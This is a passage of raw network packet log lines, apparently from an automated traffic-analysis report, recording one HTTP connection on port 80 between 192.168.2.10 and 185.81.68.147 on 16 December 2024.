                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.226824999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227549076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227560997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227571964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227581978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227591991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227602959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227612972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227623940 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227631092 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227634907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227644920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227654934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227664948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227675915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227685928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227686882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227696896 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227706909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227714062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227718115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227741957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.227760077 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228365898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228378057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228389025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228399038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228410006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228440046 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228461981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228482008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228492975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228502035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228513002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228523016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228533030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228533030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228543997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228554010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228555918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228564978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228570938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228574991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228580952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228595972 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.228612900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229454041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229469061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229479074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229496002 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229506969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229517937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229527950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229537010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229540110 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229549885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229558945 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229562044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229573011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229583979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229593992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229600906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229604006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229615927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229620934 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229626894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229636908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229643106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.229706049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230272055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230284929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230295897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230356932 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230436087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230447054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230465889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230474949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230477095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.230530977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231298923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231318951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231332064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231343031 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231344938 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231353045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231364012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231374025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231384039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231389999 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231412888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231424093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231426001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231434107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231443882 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231445074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231456041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231467962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231467962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.231667042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232000113 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232012033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232023001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232034922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232042074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232095003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232348919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232359886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232433081 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.232640982 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.233418941 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.233494043 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.233500957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.234359980 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.234416962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.234436035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.234450102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.234565020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.235357046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.235368967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.235436916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.236259937 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.236270905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.236313105 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.237222910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.237235069 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.237270117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.237982035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.238626003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.238699913 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.238841057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.238884926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.238914967 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.239727974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.240151882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.240232944 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.240595102 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.240871906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.240953922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.241522074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.241616964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.241695881 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.242312908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.242598057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.242687941 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.243457079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.243470907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.243506908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.244065046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.244255066 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.244327068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.245074034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.245136976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.245145082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.245963097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.245975971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.246081114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.246810913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.246825933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.246861935 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.247601032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.247677088 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.248022079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.248460054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.248570919 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.248662949 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.249500990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.249512911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.249600887 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.250828028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.250844955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.250873089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.251045942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.251126051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.251260042 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.251945972 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.251991034 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.252330065 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.253695011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.253705978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.253717899 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.253779888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.253808975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.253818035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.254631996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.254645109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.254677057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.255714893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.255727053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.255772114 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.256525993 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.256537914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.256566048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.257384062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.257395983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.257463932 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.258198977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.258255005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.258272886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.259028912 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.259042025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.259114027 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.260744095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.260757923 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.260777950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.260894060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.260905981 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.261615038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.261627913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.261640072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.261715889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.262764931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.262779951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.262820005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.263367891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.263914108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.263956070 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.264278889 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.264322042 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.264350891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.265331030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.265347004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.265419006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.266943932 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.266957045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.267050982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.267483950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.267496109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.267569065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.267973900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.267987013 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.268054008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.268604040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.269970894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.415554047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.415574074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.415585995 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.415810108 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.416497946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.416510105 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.416526079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.416620016 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.416647911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.417181969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.418124914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.418138027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.418234110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.418857098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.418951035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420042992 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420054913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420067072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420135975 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420845032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420856953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420867920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420938015 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.420948982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.422467947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.422480106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.422489882 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.422579050 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.423446894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.423460007 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.423471928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.423547983 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.423568964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.424823999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.424835920 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.424923897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426105022 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426116943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426127911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426203966 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426969051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426980019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.426990986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:58.427062988 CET4972380192.168.2.10185.81.68.147
